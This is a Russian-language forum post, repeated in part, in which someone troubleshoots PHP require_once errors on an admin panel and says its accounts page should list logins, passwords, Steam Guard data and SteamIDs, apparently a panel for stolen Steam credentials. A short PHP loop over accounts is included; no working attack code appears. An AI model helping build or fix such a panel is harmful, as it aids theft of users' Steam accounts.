сделал вот так
по итогу вместо not found 404 на сайте панельки выбивает следующее -
Warning: require_once(../php/classPanelPageGenerator.php): failed to open stream: No such file or directory in /home2/juxtacup/public_html/admin/index.php on line 3
Fatal error: require_once(): Failed opening required '../php/classPanelPageGenerator.php' (include_path='.:/opt/alt/php56/usr/share/pear:/opt/alt/php56/usr/share/php') in /home2/juxtacup/public_html/admin/index.php on line 3
scottparker, ну если спрашиваешь что в accounts, то там должно в панельке выбивать логин пасворд, парсить стим гуард и стимайди юзера
$rows = "";
$accounts = $Panel->arr_GetAccounts();
for ($i = 0; $i < count($accounts); $i++) {
if ($accounts[$i]["status"] == 0) $valid = "";
else $valid = "";
сделал вот так
по итогу вместо not found 404 на сайте панельки выбивает следующее -
Warning: require_once(../php/classPanelPageGenerator.php): failed to open stream: No such file or directory in /home2/juxtacup/public_html/admin/index.php on line 3
Fatal error: require_once(): Failed opening required '../php/classPanelPageGenerator.php' (include_path='.:/opt/alt/php56/usr/share/pear:/opt/alt/php56/usr/share/php') in /home2/juxtacup/public_html/admin/index.php on line 3